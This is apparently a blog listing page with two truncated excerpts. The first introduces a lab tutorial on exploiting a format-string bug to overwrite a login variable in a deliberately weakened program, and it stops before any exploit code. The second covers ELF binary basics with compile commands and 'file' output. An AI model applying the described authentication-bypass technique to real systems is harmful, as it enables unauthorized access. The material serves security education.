echo "0xHat Security"

Hi everyone, Today I will be discussing about exploiting format strings. In case you did not read the 1st part you can read here (  http://oxhat.blogspot.com/2017/12/exploiting-format-string-vulnerability.html ) In this post I will show you how we can exploit format string to write data in memory. Here is a code from a fictitious admin. Please note we have disabled ASLR system wide during this work. The code is self explanatory but still I will give a small overview about it: The code is from a fictitious admin. He has removed the password check and hence the variable called "success" that controls login never gets affected due to it. That means the value of the success variable is always 0. The admin is confident that this will stop unauthorized access to the application. Let us prove him wrong by exploiting it. What will be our attack ? Our attack will be to overwrite the success variable value with some arbitrary value so that the check pass as it will becom

In this post I will share details on ELF binary basics. So let is begin with a very simple hello world program in C #include<stdio.h> void main(){ printf("\nHello World\n"); } As I am on a 64 bit Linux system I will compile the binary for both 32bit and 64bit mode. We will compile this code with gcc by issuing the command  for 64 bit  ->  gcc hello.c -o hello64 for 32 bit  ->  gcc hello.c  -m32 -o hello32 , (   in case we get error we can install gcc multilib by issuing command   sudo apt-get install gcc-multilib ) If we issue file command on the binary we created we would see the following output  pentest@ubuntu:~/Desktop$ file hello64  hello64: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=797fa6ea8a92b773eb5106c822a76788441ceac1, not stripped pentest@ubuntu:~/Desktop$ file hello32  hello32: ELF 32-bit LSB shared